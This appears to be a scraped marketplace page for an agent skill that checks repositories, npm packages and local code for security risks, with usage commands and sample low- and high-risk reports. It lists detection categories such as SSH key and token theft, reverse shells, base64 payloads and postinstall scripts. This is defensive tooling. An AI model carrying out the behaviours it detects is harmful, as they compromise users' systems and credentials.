Loading...
Loading...
Check for security risks in Skills/code repositories. When the user wants to check if a skill, GitHub repository, npm package, or local code is safe to download or use. This includes detecting malicious code, malware, key stealing, environment variable modification, suspicious network behavior, and evaluating repository reputation (stars, forks, contributors, age). Use this skill whenever the user mentions checking skills for security risks, scanning repositories for malware, verifying code safety, checking npm packages for threats, or asking if a download is safe.
npx skill4agent add wcly/skills skill-security-checker检查这个仓库安全性: https://github.com/user/repo
检查 skill: github.com/user/repoundefined
3. **npm Packages**:
### Output Format
Users can choose the output format:
- `json` - Structured JSON report
- `friendly` - Friendly interface with emojis
- `concise` - Concise summary (default)
### Optional Parameters
- `--runtime` - Enable runtime behavior monitoring (detect dangerous scripts in package.json)
## How It Works
### Phase 1: Pre-Download Check (Mandatory)
1. **Static Code Analysis** - Detect the following patterns:
- Malicious code: base64 encoded payloads, eval/exec calls, encrypted strings, anti-debugging techniques
- Sensitive information theft: reading SSH keys, API tokens, environment variables
- Environment damage: modifying system configurations, deleting files
- Suspicious network behavior: sending data to unknown domains, reverse shells
2. **Repository Reputation Evaluation**:
- GitHub stars count
- Fork count
- Creation time
- Last update time
- Contributor count
### Phase 2: Runtime Monitoring (Optional)
When the user adds the `--runtime` parameter:
- Detect dangerous scripts in package.json (preinstall, postinstall, etc.)
- Detect suspicious dependency packages
- Briefly execute in a sandbox environment to observe behavior
### Comprehensive Assessment
- Calculate security score (0-100)
- Risk level: High/Medium/Low
- Recommendation: Downloadable/Not recommended for download
- Detailed explanation of reasons
## Example Commands
```bash
# 检查 GitHub 仓库(友好输出)
skill-security-checker github octocat/Hello-World friendly
# 检查 GitHub 仓库(JSON 格式)
skill-security-checker github https://github.com/lodash/lodash json
# 检查本地文件夹
skill-security-checker local /path/to/my-skill
# 检查 npm 包
skill-security-checker npm express
# 启用运行时检查
skill-security-checker github user/repo friendly --runtime╔══════════════════════════════════════════════════════╗
║ Skill Security Check Report ║
╠══════════════════════════════════════════════════════╣
✅ Risk Level: LOW
📊 Security Score: 85/100
✅ Recommendation: Downloadable
╠══════════════════════════════════════════════════════╣
📈 Repository Information:
⭐ Stars: 50000+
🍴 Forks: 5000+
👥 Contributors: 200+
📅 Creation Date: 2012-01-01
╚══════════════════════════════════════════════════════╝╔══════════════════════════════════════════════════════╗
║ Skill Security Check Report ║
╠══════════════════════════════════════════════════════╣
🔴 Risk Level: HIGH
📊 Security Score: 15/100
❌ Recommendation: Not recommended for download
╠══════════════════════════════════════════════════════╣
⚠️ Risk Reasons:
- Detected malicious code patterns (base64 encoded payload)
- Detected access to SSH keys
- Repository lacks social oversight (stars < 10)
📈 Repository Information:
⭐ Stars: 5
🍴 Forks: 0
👥 Contributors: 1
╚══════════════════════════════════════════════════════╝detectionPatterns.ts